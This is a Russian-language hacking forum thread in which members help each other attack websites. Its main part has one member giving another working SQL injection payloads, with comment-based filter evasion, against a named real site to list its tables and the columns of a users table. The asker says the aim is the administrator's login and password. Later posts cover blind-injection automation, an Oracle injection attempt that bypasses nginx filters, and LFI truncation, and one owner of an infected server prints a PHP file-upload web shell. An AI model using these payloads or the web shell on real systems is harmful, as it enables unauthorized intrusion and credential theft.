Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1
    подскажите,пожалуйста.
    при таком запросе сайт.ру/паппка/?id=2+union+all+select+0x31303235343830303536,(select+distinct+concat(0x27,unhex(Hex(cast(schema_name+as+char))),0x27)+from+`information_schema`.schemata+limit+1,1),0x31303235343830303536-- узнаю название базы ,но вытащить таблицы не могу сайт.ру/паппка/?id=2+union+all+select+0x31303235343830303536,(select+concat(0x27,count(table_name),0x27)+from+`information_schema`.tables+where+table_schema=0x6A757374626974635F626974707463),0x31303235343830303536--
    как можно вытащить таблицы из базы?
     
    #23581 madam, 13 Oct 2014
    Last edited: 13 Oct 2014
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    у вас функция count(table_name) — она выводит количество таблиц в вашей базе. чтобы вывести таблицы, запрос будет примерно таким:
    Code:
    ?id=2+union+all+select+0x31303235343830303536,(select+concat(0x7e,0x27,table_name,0x27,0x7e)+from+`information_schema`.tables+where+table_schema=0x6A757374626974635F626974707463+limit+1,1),0x31303235343830303536--
    и да, havij — грешно. нормальный запрос бы выглядел так:
    Code:
    +union+select+1,table_name,2+from+`information_schema`.tables+where+table_schema=0x6A757374626974635F626974707463+limit+1,1--+
    далее перебирайте limit.
     
    _________________________
    #23582 yarbabin, 13 Oct 2014
    Last edited: 13 Oct 2014
  3. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1
    спасибо конечно,вот только без havij никак,редирект на главную стр.(

    да и havij дальше имя базы не продвигается((

    вот ссылка http://bitptc. com/recommends/?id=5 db justbitc_bitptc
     
  4. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    тогда в вашем случае стоит раскручивать как blind sql.
    Code:
    http://bitptc.com/recommends/?id=5+and+1=1--+
    - редирект (значит запрос корректен)
    Code:
    http://bitptc.com/recommends/?id=5+and+1=2--+
    - нет редиректа
     
    _________________________
  5. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    забавный случай. ответ отдается в редиректе, то есть при запросе
    Code:
    http://bitptc.com/recommends/?id=-5+union+select+1,version(),3--+
    получим ответ в редиректе с версией
    [​IMG]
     
    _________________________
    1 person likes this.
  6. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    все правильно, но таблицы вывести не получится, прав не хватит
     
  7. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    есть там всё :)
    Code:
    http://bitptc.com/recommends/?id=-5+union+select+1,/*!table_name*/,3+from+information_schema.tables--+
     
    _________________________
    1 person likes this.
  8. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1
    блин((
    а как теперь из таблицы например microfaucet_users вывести имена столбцов?
     
  9. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://bitptc.com/recommends/?id=-5+union+select+1,/*!column_name*/,3+from+information_schema.columns+where+/*!table_name*/=0x6d6963726f6661756365745f7573657273--+
     
    _________________________
  10. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1
    спасибо)) только логин и пасс админа всё равно не нашла(( видать в конфиге спрятал))
     
  11. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    какие возможные алгоритмы для определния sqli? то, что пришло в голову:
    берем уязвимый параметр, подставляем в параметр сначала id=5+and+1=1-- и сравниваем размер страницы (или diff) с первоначальной (id=5). если результат одинаковый, то id=5+and+1=2-- и также сравниваем с размером исходной страницы. ваши идеи? что делать в случае, если на странице рандомно генерируемые объекты?
     
    _________________________
  12. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    иногда тупо order by помогает определить уязвимость
     
  13. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    это ты глазами увидишь, а как быть с автоматизацией? вомзожен такой вариант, что размер страницы особо не поменяется (пара кб или меньше)
     
    _________________________
  14. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Как вариант можно рассмотреть через sleep(), как то на практике встречалась уязвимость, которая генерировала координаты на картинке, само тело страници не менялось, зато менялся вес картинки, пришлось писать скрипт для автоматизации скули где вес картинки больше n-го размера, там true.
     
    _________________________
  15. system331

    system331 New Member

    Joined:
    18 Dec 2008
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Столкнулся тут с oracle. Иньекция ли это и возможно ли её раскрутить?

    есть поле ввода, ввожу параметр ;; и выдаёт ошибку:

    Code:
    java.sql.SQLException: ORA-20000: ORA-29902: error in executing ODCIIndexStart() routine ORA-20000: 
    Oracle Text error: DRG-50901: text query parser syntax error on line 1, column 3 ; 
    ORA-06512: at "SYS.DBMS_SQL", line 1841 ORA-06512: at "MP.MP_GATE", line 668 ORA-06512: at "MP.MP_GATE", line 681 ORA-29902: error in executing ODCIIndexStart() routine ORA-20000: 
    Oracle Text error: DRG-50901: text query parser syntax error on line 1, column 3 ORA-06512: at line 1
    
    ввожу ">qweqweqwe;
    Code:
    java.sql.SQLException: ORA-20000: ORA-29902: error in executing ODCIIndexStart() routine ORA-20000: 
    Oracle Text error: DRG-50900: text query parser error on line 1, column 4 DRG-50905: invalid score threshold QWEQWEQWE ; 
    ORA-06512: at "SYS.DBMS_SQL", line 1841 ORA-06512: at "MP.MP_GATE", line 668 ORA-06512: at "MP.MP_GATE", line 681 ORA-29902: error in executing ODCIIndexStart() routine ORA-20000: 
    Oracle Text error: DRG-50900: text query parser error on line 1, column 4 DRG-50905: invalid score threshold QWEQWEQWE ORA-06512: at line 1 
    ввожу ">order+by+1;
    Code:
     java.sql.SQLException: ORA-20000: ORA-29902: error in executing ODCIIndexStart() routine ORA-20000: 
    Oracle Text error: DRG-50900: text query parser error on line 1, column 4 DRG-50905: invalid score threshold ORDER+BY+1 ; 
    ORA-06512: at "SYS.DBMS_SQL", line 1841 ORA-06512: at "MP.MP_GATE", line 668 ORA-06512: at "MP.MP_GATE", line 681 ORA-29902: error in executing ODCIIndexStart() 
    routine ORA-20000: Oracle Text error: DRG-50900: text query parser error on line 1, column 4 DRG-50905: invalid score threshold ORDER+BY+1 ORA-06512: at line 1
    ввести select, union в любом регистре, откоментировать -- или /* не возможно, nginx фильтрует и сразу редиректит на страницу с ошибкой

    Прошу помощи
     
  16. GAiN

    GAiN Elder - Старейшина

    Joined:
    2 Apr 2011
    Messages:
    2,550
    Likes Received:
    172
    Reputations:
    99
    как получать ссылку на некоторые элементы, например на лайки или палец вверх ?
    [​IMG]
    вот например тут - как узнать запрос к этой кнопке ? и подобным кнопкам не имеющих в коде ссылок
     
  17. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    посмотреть на сниффере, куда он отправляется. charles или tamper data в firefox.
     
    _________________________
    1 person likes this.
  18. RedX

    RedX Member

    Joined:
    12 Jun 2008
    Messages:
    40
    Likes Received:
    13
    Reputations:
    4
    Ребят, подскажите с обрезанием окончания к LFI
     
  19. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    Альтернатива нулл байту не срабатывает(
     
  20. ghost1k

    ghost1k New Member

    Joined:
    4 Mar 2013
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    дыра на сервере / сайте

    В общем какая-то зараза залезла на сервер.
    Создает переодически(?) различные файлы типа class.php / main.php / и другие интересные названия. Раньше еще редиректы прописывало в .htaccess, но это я поправил изменением прав (такая вот заплатка). А еще оно делает файл с вот таким содержимым:
    PHP:
    <?
    if (
    $_FILES['F1l3']) {move_uploaded_file($_FILES['F1l3']['tmp_name'], $_POST['Name']); Exit;}
      if (
    $_FILES['F1l3']) {
        
    move_uploaded_file($_FILES['F1l3']['tmp_name'], $_POST['Name']);
        echo 
    'OK';
      } else {
        echo 
    'You are forbidden!';
      }
    ?>

    Искал и айболитом и с помощью:
    find ./ -name '*.php' | xargs grep -E '[0-9a-zA-Z/]{80}' > viruses.txt

    что-то находил, что-то удалял, но пока не помогло.
    чего еще сотворить? эта зараза лезет не в конкретную cms, хотя я раньше думал, что так. На данный момент создает эти файлы тупо в корне сайта. До этого они проявлялись в самых далеких местах, после вчерашней чистки пока только в корне.
     
Thread Status:
Not open for further replies.